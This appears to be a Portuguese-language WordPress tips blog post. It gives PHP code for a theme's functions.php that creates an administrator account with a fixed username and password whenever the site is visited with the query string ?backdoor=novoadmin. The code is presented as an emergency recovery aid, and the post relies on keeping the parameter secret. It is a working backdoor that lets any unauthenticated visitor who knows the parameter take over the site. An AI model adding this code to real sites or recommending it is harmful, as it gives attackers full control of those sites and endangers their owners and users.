Backdoor para criação de novo administrador

Adicione o código abaixo no arquivo functions.php de seu tema WordPress para criar um backdoor que crie um novo usuário administrador, para ser usado em emergências.

add_action(‘wp_head’, ‘meu_backdoor’);

function meu_backdoor() {
If ($_GET[‘backdoor’] == ‘novoadmin’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘AdminNovo’)) {
$user_id = wp_create_user(‘AdminNovo’, ‘SenhaDoUsuario’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
}
}

Para ativar tal função, basta acessar o endereço https://www.meusite.com.br?backdoor=novoadmin

Logicamente, você deve alterar o usuário ‘AdminNovo’ e senha ‘SenhaDoUsuario’ na linha $user_id. Aconselho também a trocar o nome da função de ‘novoadmin’ para algo que só você saiba.

Lembre-se que usar esse código pode ser considerado um risco de segurança, qualquer um poderia facilmente executar essa função, chamando o querystring correta, por isso a necessidade de a alterar e usar parâmetros que só você saiba, como costumamos fazer com nossas senhas e dados sigilosos.

Use este código apenas para o bem, para você mesmo, ok ?

Posts Similares

  • Permitindo que colaboradores façam upload de arquivos

    O perfil de usuário “colaborador” do WordPress permite aos usuários criar postagens para o site. Entretanto, tal nível de usuário não permite o upload de arquivos para ilustrar os posts ou para downloads.

  • Como inserir uma chamada em meu Feed Rss?

    Se você desejar inserir uma chamada ou anúncio para aparecer apenas no RSS, no final de cada post, insira o código abaixo em seu arquivo functions.php:   function insertFootNote($content) { if(!is_feed() && !is_home()) { $content.= “<h4>Gostou deste artigo?</h4>”; $content.= “<p>Inscreva-se em nosso <a href=’#’>feed RSS</a></p>”; } return $content; } add_filter (‘the_content’, ‘insertFootNote’); Tal técnica é…

  • Como criar usuário WordPress sem acesso ao Banco de Dados e WP-Admin

    Essa semana me procuraram com uma pergunta inusitada. Valério, perdi o acesso ao meu painel administrativo do WordPress, e estou sem acesso ao banco e como estou somente criando um template, só tenho acesso à pasta do template via FTP. Como resolver esse problema? Bom, essa pessoa me perguntou isso num sábado a noite e,…

  • Como utilizar os Campos Personalizados em seu tema

    Provavelmente você já viu no Adicionar novo post ou página o formulário Campos personalizados. Com os campos personálizados você pode adicionar qualquer campo e posteriormente inserir em seu tema. Para inserir em seu temas algum campo, utilize a seguinte tag: <?php $values = get_post_custom_values(”campo“); echo $values[0]; ?> Altere campo pelo nome que você escolheu para…

  • Mais cores para a seção administrativa do WordPress 3.8

    Uma das coisas que mais gostei no WordPress 3.8 foi o novo esquema de cores para a parte administrativa do WordPress. Não só das que vem como padrão, mas já vislumbrando a possibilidade de criar mais esquemas e dar uma cara diferente para cada projeto, os personalizando ainda mais. Se você não encontrar um esquema…

  • A pré-visualizaçao de temas no WordPress parou de funcionar. E agora ?

    Já repararam que em algumas ocasiões instalamos um novo tema em nosso WordPress, entramos no painel de administração do site e quando clicamos no tema para o pré-visualizar a visualização aparece toda em branco, não mostrando o preview do tema ? Isso também já aconteceu comigo e descobri o motivo de tal erro. Caso a…

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *